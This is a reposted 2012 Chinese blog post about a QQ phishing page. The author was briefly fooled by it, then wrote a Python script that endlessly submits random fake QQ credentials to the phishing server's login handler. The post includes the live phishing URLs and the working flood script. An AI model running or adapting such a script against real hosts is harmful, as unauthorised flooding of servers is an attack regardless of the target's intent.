(转自CSDN Dinosoft's Blog)给钓鱼网站骗子一点颜色看看---一个简单的攻击程序

(转自CSDN Dinosoft's Blog)给钓鱼网站骗子一点颜色看看---一个简单的攻击程序
2012年01月01日
　　群里有人发了一个骗子的链接，不知是被盗号还是怎么。
　　
　　
　　
　　http://tuisend.china.com//cc/00AOLhttp://p.tl/4P9G
　　链接在中华网域名下，跟“中国领事馆”的主题配合得很好，能骗到不少2B青年了。
　　这个tuisend.china.com到底是啥？反正功能是可以提供url转向。猜想是个用来统计的接口什么的吧。“tuisend”？“推送”？
　　这种东西一看就知道是骗人的，很好奇骗子是要干什么（广告？盗号？木马？。。），于是点进去看看。
　　点进去一跳转，地址就露馅了。假页面用iframe嵌入了一个真实的QQ空间，节省带宽，真实度又100%。不过css没调好，页面有白边。弹出一个输入Qzone密码的对话框。我刚开始就被骗了，以为是真的QQ空间，也没去注意看域名什么的。不过输完密码一下子就恍然大悟，赶紧去修改了QQ密码，还好没被盗号。
　　
　　反正最近密码泄漏得很厉害，也该改改密码了。
　　
　　
　　
　　太让我生气了！所以决定教训一下这些混蛋，灌一堆假密码进去！
　　python代码：
　　view plain
　　# -*- coding: UTF-8 -*-  import urllib, urllib2, cookielib  import random, string     myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar())  openner = urllib2.build_opener(myCookie)     while  True:      QQNumber='%d'%random.randrange(12345678,999999999);      passlen = random.randrange(8,14)      QQPassWord= string.join( random.sample('dadofiahdnwj12746t32dadhknczoqwe',passlen)).replace(" ", "");      yzm=string.join( random.sample('ZLJOIFENFECWOIEYSWEMEL', 5)).replace(" ", "")      print "fake QQ",QQNumber      print "fake Password",QQPassWord               website="http://bgfd7.fvx.8866.org:80"      path="/16/index2.asp"      params=urllib.urlencode({"QQNumber":QQNumber, "QQPassWord":QQPassWord})      r = urllib2.Request( website+path, params )      data = openner.open(r).read()      print data            r = urllib2.Request( website+path, params )      data = openner.open(r).read()      print data 
　　就是用firefox抓取到提交地址，直接模拟提交而已。用到随机数据的生成和urllib2。
　　不过说起来简单，实现的时候有大问题。
　　骗子的网站基本流程是这样的：
　　前端很简陋，没输入密码也能提交，不过提交后如果没填密码会提示不正确。
　　第一次提交后，猜想骗子把帐号记录到session，然后骗你帐号错，再输入一遍！如果qq号之前已经输入过，则自动跳转到qq空间。
　　为了确认自己攻击成功，需要打印出服务器响应的内容，成功的话，是会显示一个form表单，然后用js提交实现页面跳转。失败的话，会输出alert提示。
　　所以，攻击程序需要加上cookie支持，而且攻击要提交两次才行！刚开始没弄清楚，还害我调试很久!
　　
　　验证码可以不用发送，骗子根本不关心，程序也没验证
　　
　　
　　开始时不成功，今天想起来还是觉得耿耿于怀，手痒再整了一把，终于被我搞定。